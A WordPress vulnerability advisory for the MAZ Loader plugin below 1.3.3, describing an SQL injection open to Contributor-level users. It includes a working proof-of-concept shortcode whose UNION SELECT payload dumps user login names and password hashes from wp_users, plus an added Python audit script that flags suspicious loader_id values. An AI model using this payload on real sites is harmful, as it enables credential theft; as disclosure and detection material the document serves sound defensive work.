WordPress Plugin Vulnerabilities

MAZ Loader < 1.3.3 - Contributor+ SQL Injection

Description

The plugin does not validate or escape the loader_id parameter of the mzldr shortcode, which allows users with a role as low as Contributor to perform SQL injection.

Proof of Concept

As a user with a role as low as Contributor, put the following shortcode in a page/post and view/preview it to get the login name:password hash pair of the first user in the database (generally admin).

[mzldr loader_id="12345 UNION SELECT 0,1,'SQLi',CONCAT(FROM_BASE64('eyJkYXRhIjp7IjEiOnsiaWQiOjEsInR5cGUiOiJ0ZXh0IiwidGV4dCI6Ig=='),user_login,':',user_pass,FROM_BASE64('Iiwic2l6ZSI6MTAwLCJiYWNrZ3JvdW5kIjoiIiwiY29sb3IiOiIiLCJwYWRkaW5nX3RvcCI6MCwicGFkZGluZ19yaWdodCI6MCwicGFkZGluZ19ib3R0b20iOjAsInBhZGRpbmdfbGVmdCI6MCwicGFkZGluZ19saW5rIjoiYWxsIiwicGFkZGluZ190eXBlIjoicHgiLCJtYXJnaW5fdG9wIjowLCJtYXJnaW5fcmlnaHQiOjAsIm1hcmdpbl9ib3R0b20iOjAsIm1hcmdpbl9sZWZ0IjowLCJtYXJnaW5fbGluayI6ImFsbCIsIm1hcmdpbl90eXBlIjoicHgifX0sInNldHRpbmdzIjp7Im1pbmltdW1fbG9hZGluZ190aW1lIjoyMDAwLCJkdXJhdGlvbiI6MTAwMCwiZGVsYXkiOjAsInNob3dfb25faG9tZXBhZ2UiOiJvZmYifSwiYXBwZWFyYW5jZSI6eyJiYWNrZ3JvdW5kX2NvbG9yIjoiI2RkOTkzMyIsImJhY2tncm91bmQiOiIiLCJiYWNrZ3JvdW5kX2ltYWdlX3R5cGUiOiJjb3ZlciIsImJhY2tncm91bmRfaW1hZ2VfcG9zaXRpb24iOiJjZW50ZXJfY2VudGVyIiwiYmFja2dyb3VuZF9jb2xvcl9vdmVybGF5IjoiIiwiY29udGVudF9wb3NpdGlvbiI6ImNlbnRlciIsIml0ZW1zX3NpZGVfYnlfc2lkZSI6Im9mZiIsImRpc2FibGVfcGFnZV9zY3JvbGwiOiJvbiJ9LCJjdXN0b21fY29kZSI6IiIsInB1Ymxpc2hfc2V0dGluZ3MiOiIifQ==')),1,'2021-08-24 00:00:00',NULL,1 FROM wp_users UNION SELECT *, 1 FROM wp_mzldr_loaders WHERE 0=1"]

Affects Plugins

Fixed in 1.3.3
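For sites that ran a version before 1.3.3, stored post content can be audited for mzldr shortcodes whose loader_id is not a plain integer. The following Python check is an added example, not code from the plugin or from the original advisory; the (post_id, author, content) row layout and the sample rows are constructed, and it assumes a legitimate loader_id is always a non-negative integer.

```python
import re

# [mzldr ...] tags; the attribute text is taken up to the first "]".
SHORTCODE_RE = re.compile(r"\[mzldr(?![\w-])([^\]]*)\]")
# loader_id="..." | loader_id='...' | loader_id=bare
# (the attribute name is matched case-insensitively).
ATTR_RE = re.compile(
    r"""\bloader_id\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""",
    re.IGNORECASE,
)
# Assumption: a legitimate loader_id is a non-negative integer.
PLAIN_INT_RE = re.compile(r"[0-9]+")


def audit_posts(posts):
    """Return (post_id, author, value) for every mzldr shortcode whose
    loader_id is not a plain integer.

    posts is an iterable of (post_id, author, content) tuples, for example
    rows exported from the posts table (hypothetical layout).
    """
    findings = []
    for post_id, author, content in posts:
        for tag in SHORTCODE_RE.finditer(content):
            attr = ATTR_RE.search(tag.group(1))
            if attr is None:
                continue  # shortcode used without a loader_id attribute
            value = next(g for g in attr.groups() if g is not None)
            if not PLAIN_INT_RE.fullmatch(value.strip()):
                # Truncate so long payloads do not flood the report.
                findings.append((post_id, author, value[:60]))
    return findings


# Constructed sample rows, not real site data.
SAMPLE_POSTS = [
    (101, "editor1", 'Welcome [mzldr loader_id="3"] to the site'),
    (102, "contributor1", 'Draft [mzldr loader_id="12345 UNION SELECT ..."]'),
    (103, "author1", "No attributes here: [mzldr]"),
]

if __name__ == "__main__":
    for post_id, author, value in audit_posts(SAMPLE_POSTS):
        print(f"post {post_id} by {author}: suspicious loader_id {value!r}")
```

Any post it reports was authored by an account that could reach the injection point, so the finding also identifies which user to review.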

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2021-10-11
Added
2021-10-11
Last Updated
2022-04-08